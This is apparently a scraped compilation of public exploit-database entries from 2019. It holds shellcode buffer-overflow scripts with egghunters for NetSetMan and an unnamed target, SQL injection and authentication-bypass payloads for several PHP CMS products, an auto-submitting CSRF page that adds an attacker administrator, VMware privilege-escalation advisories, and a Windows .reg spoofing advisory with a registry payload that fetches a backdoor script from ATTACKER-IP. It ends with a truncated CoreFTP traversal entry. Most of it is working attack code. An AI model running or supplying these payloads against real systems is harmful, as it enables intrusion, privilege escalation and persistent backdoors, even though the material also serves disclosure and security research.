egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 =  "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"

eip = "\x77\x5a\x46"

buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip   # Direct Eip Overflow

f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip   # Direct Eip Overflow
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()
HireHackking 
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V2 - Authentication Bypass
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-6-php-hazir-haber-sitesi-scripti-v2.html
# Demo Site: http://haberv2.proemlaksitesi.net
# Version: V2
# Tested on: Kali Linux
# CVE: N/A

----- PoC: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'
HireHackking 
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V3 - Multiple Vulnerabilities
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-16-php-hazir-haber-sitesi-scripti-v3.html
# Demo Site: http://haberv3.proemlaksitesi.net
# Version: V3
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/fonksiyonlar.php
Vulnerable Parameter: videoid (GET)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/datagetir.php
Vulnerable Parameter: q (GET)
Payload:
datagetir.php?deger=undefined&dog=undefined&komut=ilcegetir&q=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&son=undefined


----- PoC 4: SQLi -----

Request: http://localhost/[PATH]kelimeara
Vulnerable Parameter: kelime (POST)
Payload: fgit=videoyorumlar&videoid=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvzqq','LtSqAGUtJGxRGVrFfaFBRmvYYHCMdjkRYqQBbQfc'),'qqkjq'),NULL,NULL--
Kcmb


----- PoC 5: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/login.php
Username: '=' 'or'
Password: '=' 'or'
HireHackking 
# Exploit Title: Jettweb PHP Hazır Haber Sitesi Scripti V1 - Multiple Vulnerabilities
# Date: 23.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://jettweb.net/u-5-php-hazir-haber-sitesi-scripti-v1.html
# Demo Site: http://haberv1.proemlaksitesi.net
# Version: V1
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/gallery.php?gallery_id=1
Vulnerable Parameter: gallery_id (GET)
Payload: gallery_id=1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x63565549564d5a424e57746d6d62614e4f6e4a7559666a744d50557776636e4e6a6952504d494444,0x71626a7a71)--
UsCA


----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/haberarsiv.php?cid=1
Vulnerable Parameter: cid (POST)
Payload: cid=1' UNION ALL SELECT
CONCAT(0x7162707a71,0x506a594d7a4f6c64674249466d746d6c5751486e786745667369685263624c6445654f665a4f4146,0x7162706a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
ihPG

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/arama.php?T1=btnVote=G%C3%B6nder&ara=1
Vulnerable Parameter: poll (POST)
Payload:
1&option=2&poll=-1'%20OR%203*2*1=6%20AND%20000889=000889%20--%20&stage=

----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/uyelik.php
Vulnerable Parameter: option (POST)
Payload:
btnVote=G%C3%B6nder&option=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&poll=1&stage=2


----- PoC 5: Authentication Bypass -----

Administration Panel: http://localhost/[PATH]/yonetim/admingiris.php
Username: '=' 'or'
Password: '=' 'or'
HireHackking 
VMware: Host VMX Process Impersonation Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.0.2.
Class: Elevation of Privilege

Summary: The creation of the VMX process on a Windows host can be hijacked leading to elevation of privilege.

Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.

Unfortunately the process is created as the desktop user and follows the common pattern of impersonating the user while calling CreateProcessAsUser. This is an issue as the user has the ability to replace any drive letter for themselves, which allows a non-admin user to hijack the path to the VMX executable, allowing the user to get arbitrary code running as a “trusted” VMX process. While having an elevated integrity level isn’t especially dangerous, the fact that arbitrary code is running as a  “trusted” VMX process means you can access all the facilities for setting up VMs, such as the “opensecurable” command which allows the process to open almost any file as SYSTEM for arbitrary read/write access which could easily be used to get administrator privileges. Write file write access you could perform an attack similar to https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html. 

I reported the technique of hijacking process creation to Microsoft over 3 years ago (see https://bugs.chromium.org/p/project-zero/issues/detail?id=351). Unfortunately Microsoft declined to fix it at the time. This makes fixing this issue more difficult than it should be. You might think a a quick fix would be to not impersonate the user over the call to CreateProcessAsUser. However you can end up with other issues such as (https://bugs.chromium.org/p/project-zero/issues/detail?id=692). Also even if the user didn’t hijack the main process creation they could instead hijack DLL’s loaded by the VMX process once started. 

A more comprehensive fix would to not create the process as the desktop user, instead using another user identity, however that in itself has risks and makes things considerably more complex.

Proof of Concept:

I’ve provided a PoC as a C#/C++ project. The C# application will perform the hijack and get the C++ vmware-vmx process 

1) Compile the project. It will need to grab the NtApiDotNet from NuGet to work.
2) Ensure the compiled output directory has the files HijackVMXProcess.exe, NtApiDotNet.dll and vmware-vmx.exe.
3) Run HijackVMXProcess.exe. If successful you should find that instead of the installed version of vmware-vmx the fake one is running. You can also specify a path to HijackVMXProcess and the fake vmware-vmx will demonstrate opening the file using the opensecurable command for write access.

Expected Result:
The VMX process created is the version provided by VMWare.

Observed Result:
The VMX process is a fake one provided by the PoC which allows access to secured commands.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46600.zip
HireHackking 
VMware: Host VMX Process COM Class Hijack EoP
Platform: VMware Workstation Windows v14.1.5 (on Windows 10). Also tested VMware Player 15.
Class: Elevation of Privilege

Summary: COM classes used by the VMX process on a Windows host can be hijacked leading to elevation of privilege.

Description: The VMX process (vmware-vmx.exe) process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created with an elevated integrity level by the authentication daemon (vmware-authd.exe) which runs at SYSTEM. This prevents a non-administrator user opening the process and abusing its elevated access.

Unfortunately the process is created as the desktop user which results in the elevated process sharing resources such as COM registrations with the normal user who can modify the registry to force an arbitrary DLL to be loaded into the VMX process. 

The COM classes observed to be loaded by the VMX process, and thus can be hijacked by modifying the registry  are as follows:

1b1cad8c-2dab-11d2-b604-00104b703efd Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject
7c857801-7381-11cf-884d-00aa004b2e24 PSFactoryBuffer
8bc3f05e-d86b-11d0-a075-00c04fb68820 Windows Management and Instrumentation
bcde0395-e52f-467c-8e3d-c4579291692e MMDeviceEnumerator class
cb8555cc-9128-11d1-ad9b-00c04fd8fdff WbemAdministrativeLocator Class
d68af00a-29cb-43fa-8504-ce99a996d9ea Microsoft WBEM (non)Standard Marshaling for IWbemServices
e7d35cfa-348b-485e-b524-252725d697ca PSFactoryBuffer

The majority of these are related to WMI and are probably not critical so could be removed, however MMDeviceEnumerator is used to find audio devices which is probably important. Also note that hijacking COM classes isn’t necessarily the only resource which could be hijacked. From a fixing perspective I don't know of any documented way of preventing the lookup of COM classes from HKEY_CURRENT_USER other than running the process as an administrator, about all you can do is not use COM at all. As with the other bug I’ve reported at the same time a more comprehensive fix would probably to not create the process as the desktop user, instead using another user identity, however that in itself has risks.

Proof of Concept:

I’ve provided a PoC as a C++ project. 

1) Compile the project, make sure to compile the x64 version of the DLL otherwise the PoC will fail.
2) Copy the compiled HijackDll.dll to the folder c:\hijack. 
3) Install the hijack.reg file using REGEDIT or the command line REG tool. This setups up a hijack of the CB8555CC-9128-11D1-AD9B-00C04FD8FDFF class. 
4) Start a VMX instance using the normal GUI or vmrun.

Expected Result:
The system COM class is loaded into the VMX.

Observed Result:
The VMX process loads the hijack DLL into memory and a dialog box appears proving the code injection.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46601.zip
HireHackking 
# Exploit Title: Zeeways Matrimony CMS - SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/matrimony-cms/4/productdetail
# Demo Site: http://www.zeewayscms.com/matrimony/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: up_cast (POST)
Payload:  (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(117),CHAR(82),CHAR(120),CHAR(106),CHAR(69),CHAR(48),CHAR(117),CHAR(107)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/profile_list
Vulnerable Parameter: s_mother (GET)
Payload: (select 1 and row(1%2C1)>(select
count(*)%2Cconcat(concat(CHAR(52)%2CCHAR(67)%2CCHAR(117)%2CCHAR(113)%2CCHAR(82)%2CCHAR(106)%2CCHAR(97)%2CCHAR(51)%2CCHAR(113)%2CCHAR(122)%2CCHAR(116))%2Cfloor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))


----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/profile_list?s_mother=1
Vulnerable Parameter: s_religion (POST)
Payload: (select 1 and row(1,1)>(select
count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(50),CHAR(86),CHAR(74),CHAR(77),CHAR(54),CHAR(109),CHAR(84),CHAR(73)),floor(rand()*2))x
from (select 1 union select 2)a group by x limit 1))
HireHackking 
# Exploit Title: Zeeways Jobsite CMS - 'id' SQL Injection
# Date: 25.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: http://www.zeeways.com/jobsite-cms/1/productdetail
# Demo Site: http://www.zeewayscms.com/jobsite/
# Version: Lastest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN
(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING
MIN(0)#
HireHackking 
# Exploit Title: PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)
# Google Dork: N/A
# Date: 10-03-2019
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://github.com/piluscart
# Software Link: https://sourceforge.net/projects/pilus/files/PiLUS/1.4.1/PiLUS-1.4.1-Ubiungu-stable.zip/download
# Version: 1.4.1
# Tested on: ParrotOS
# CVE : 2019-9769

PilusCart 1.4.1 is vulnerable to CSRF attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), a form will be submitted that will add a new user as administrator.


PoC:


<html>
<iframe style="width:0;height:0;border:0; border:none;" name="csrf-frame"></iframe>

<form name="adduser" action="http://server/cabin/index.php?module=users&action=newUser" method="post" target="csrf-frame">
    <input type="submit">
    <input type="hidden" name="admin_id" value="">
    <input type="hidden" name="session_id" value="">
    <input type="hidden" name="admin_login" value="attacker">
    <input type="hidden" name="admin_fullname" value="attacker">
    <input type="hidden" name="admin_email" value="admin@attacker.com">
    <input type="hidden" name="admin_pass" value="admin">
    <input type="hidden" name="confirm_pass" value="admin">
    <input type="hidden" name="admin_level" value="admin">
    <input type="hidden" name="admin_url" value="">
    <input type="hidden" name="saveAdmin" value="Simpan">
        
</form>

<script>
document.forms.adduser.submit();
</script>
</html>
HireHackking 
#Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows XP SP3

#-------------------------------------------------------------------------------

#Steps to replicate:
#1. Run the Python code below which outputs two payload .txt files.
#2. Open NetSetMan
#3. Enable "Workgroup" for both the "[Double Click!]" tab and "SET1" tab
#4. Paste contents of "payload2.txt" into the "Workgroup" field in the "SET1" tab.
#5. Paste contents of "payload1.txt" into the "Workgroup" field in the "[Double Click!]" tab.
#6. Click "Activate"
#7. ...
#8. Profit

#This is a unicode SEH overflow, but the buffer is too small for a unicode encoded reverse shell payload.
#Therefore, an egghunter is implemented to locate an alphanumeric encoded payload stored in memory.

#-------------------------------------------------------------------------------

# msfvenom -p windows/exec cmd=calc.exe -b "\x00" -e x86/alpha_mixed -f python
#-v shellcode EXITFUNC=seh BufferRegister=EDI
#Payload size: 440 bytes
shellcode =  ""
shellcode = "w00tw00t"
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x69\x6c\x59\x78\x6d\x52\x57\x70"
shellcode += "\x43\x30\x75\x50\x53\x50\x6c\x49\x49\x75\x36\x51"
shellcode += "\x39\x50\x71\x74\x6c\x4b\x56\x30\x46\x50\x4e\x6b"
shellcode += "\x71\x42\x46\x6c\x4e\x6b\x76\x32\x57\x64\x6e\x6b"
shellcode += "\x44\x32\x34\x68\x76\x6f\x6d\x67\x43\x7a\x71\x36"
shellcode += "\x44\x71\x6b\x4f\x6e\x4c\x57\x4c\x65\x31\x33\x4c"
shellcode += "\x47\x72\x36\x4c\x75\x70\x6f\x31\x5a\x6f\x34\x4d"
shellcode += "\x67\x71\x39\x57\x48\x62\x4a\x52\x43\x62\x46\x37"
shellcode += "\x6c\x4b\x32\x72\x32\x30\x6c\x4b\x71\x5a\x45\x6c"
shellcode += "\x6e\x6b\x70\x4c\x32\x31\x73\x48\x4a\x43\x63\x78"
shellcode += "\x56\x61\x6e\x31\x56\x31\x6e\x6b\x30\x59\x57\x50"
shellcode += "\x35\x51\x79\x43\x6c\x4b\x72\x69\x55\x48\x4d\x33"
shellcode += "\x46\x5a\x52\x69\x4e\x6b\x77\x44\x6e\x6b\x76\x61"
shellcode += "\x68\x56\x75\x61\x6b\x4f\x6c\x6c\x59\x51\x78\x4f"
shellcode += "\x66\x6d\x77\x71\x4b\x77\x30\x38\x6d\x30\x51\x65"
shellcode += "\x58\x76\x53\x33\x43\x4d\x69\x68\x67\x4b\x73\x4d"
shellcode += "\x67\x54\x50\x75\x4b\x54\x62\x78\x4c\x4b\x73\x68"
shellcode += "\x76\x44\x57\x71\x68\x53\x71\x76\x6e\x6b\x56\x6c"
shellcode += "\x72\x6b\x6e\x6b\x43\x68\x47\x6c\x66\x61\x6e\x33"
shellcode += "\x6e\x6b\x76\x64\x6c\x4b\x36\x61\x6a\x70\x6d\x59"
shellcode += "\x31\x54\x76\x44\x66\x44\x63\x6b\x61\x4b\x65\x31"
shellcode += "\x51\x49\x50\x5a\x73\x61\x59\x6f\x79\x70\x51\x4f"
shellcode += "\x71\x4f\x43\x6a\x4e\x6b\x55\x42\x5a\x4b\x4c\x4d"
shellcode += "\x73\x6d\x61\x7a\x37\x71\x6c\x4d\x6c\x45\x58\x32"
shellcode += "\x55\x50\x45\x50\x43\x30\x36\x30\x52\x48\x64\x71"
shellcode += "\x6c\x4b\x32\x4f\x4e\x67\x59\x6f\x79\x45\x4f\x4b"
shellcode += "\x6b\x4e\x56\x6e\x75\x62\x48\x6a\x65\x38\x6f\x56"
shellcode += "\x4a\x35\x6d\x6d\x6f\x6d\x6b\x4f\x68\x55\x75\x6c"
shellcode += "\x53\x36\x43\x4c\x36\x6a\x4b\x30\x4b\x4b\x6d\x30"
shellcode += "\x34\x35\x77\x75\x4f\x4b\x62\x67\x64\x53\x30\x72"
shellcode += "\x72\x4f\x30\x6a\x53\x30\x43\x63\x4b\x4f\x68\x55"
shellcode += "\x42\x43\x30\x61\x70\x6c\x31\x73\x44\x6e\x30\x65"
shellcode += "\x32\x58\x51\x75\x55\x50\x41\x41"

egghunter =(
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA"
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A"
"PB944JBC6SQGZKOLO0B0RQZOSR88MNNOLKUPZSDJO6XT7NPNP3DTKKJ6OD5JJ"
"6OBUK7KOYWLJA"
)

regPrep = (
    "\x63" #nop/align
    "\x55" #push ebp
    "\x62" #nop/align
    "\x58" #pop eax
    "\x62" #nop/align
    "\x05\x14\x11" #add eax, 0x11001400
    "\x62" #nop/align
    "\x2d\x13\x11" #sub eax, 0x11001300
    "\x62" #nop/align
    "\x50" #push eax
    "\x62" #nop/align
    "\xc3") #ret

buffer = ""
buffer += "\x61" * 75 #junk
buffer += "\x62" * 1  #nop

#0x00590058 : pop ebx # pop ebp # ret 0x08 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [netsetman.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.7.1.0 (C:\Program Files\NetSetMan\netsetman.exe)
buffer += "\x58\x59" #SEH overwrite to pop-pop-ret instruction
buffer += regPrep
buffer += "\x62" * 108 #offset to egghunter
buffer += egghunter

#Write initial SEH overflow payload + egghunter with venetian shellcode
f = open('payload1.txt','w')
f.write(buffer)
f.close()

#Egg + alphanumeric encoded shellcode payload
g = open('payload2.txt', 'w')
g.write(shellcode)
g.close()
HireHackking 
[+] Credits: John Page (aka hyp3rlinx)		
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec          
 

[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch (if user is run as Admin) if targeting a non privleged user we can still hijack HKCU reg settings
without having to deal with UAC. After they will get the registry security warning dialog box asking them if they "trust the source" and
"Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?"
dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its
default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0.

Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like.
Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:
------------------------------------------------------------------------------------------------
Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us
"the keys and values contained in <REGFILE> have been successfully added to the registry".

We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you.
You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename 
%25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename 
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename.
We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box.

The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg"
in the registry dialog box, along with our spoofed user directions.
 
While this spoofing vulnerability requires user interaction and bypassing Windows UAC (if targeting Admin) prompt to succeed, the fact the we can prevent secondary
registry dialogs and modify registry messages displayed to the user makes it a viable attack vector. If we are successful in our attack we can achieve a persistent
RCE backdoor all while the user thinks they have aborted the import. Moreover, targeting a non privileged user allows us to hijack programs and not worry about UAC.


[POC Video URL]
https://vimeo.com/322684636


[Exploit/POC]
Persistent Remote Code Execution Backdoor: 

This will add entry to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe"
for a persistent rundll32 payload targeting MSIE that references a JScript XML based file on our remote server.

1) Create a Windows .REG Registry file named.

"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

Registry file Contents.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")"


2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as "backdoor" will execute Windows calc.exe when Microsoft Internet Explorer is launched.

<?xml version="1.0"?>
<package>
<component id="testCalc">
<script language="JScript">
<![CDATA[
new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>
</component>
</package>



[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: March 1, 2019
MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."
Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability" Lol.
March 10, 2019 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
HireHackking 
# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  MDTM Directory Traversal
# Google Dork: N/A
# Date: 3/13/2019
# Exploit Author: Kevin Randall
# Vendor Homepage: https://www.coreftp.com
# Software Link: http://www.coreftp.com/server/index.html
# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
# Tested on: Windows 7
# CVE : CVE-2019-9649

*Vendor has confirmed vulnerability and implemented an updated version*

Summary: Summary: By utilizing a directory traversal along with the FTP MDTM command, an attacker can browse outside the root directory to determine if a file exists based on return file size along with the date the file was last modified by using a ..\..\ technique
Tools used:
Parrot OS VM
Windows 7 VM
FTP / SFTP Server v2 - Build 674
Netcat

Proof of Concept (PoC):

File 1: ARP.exe
Type of file: Application(.EXE)
Description: TCP/IP Arp Command
Location: C:\Windows\System32\
Size: 20.5 KB (20,992 bytes)
Size on disk: 24.0 KB (24,576 bytes)
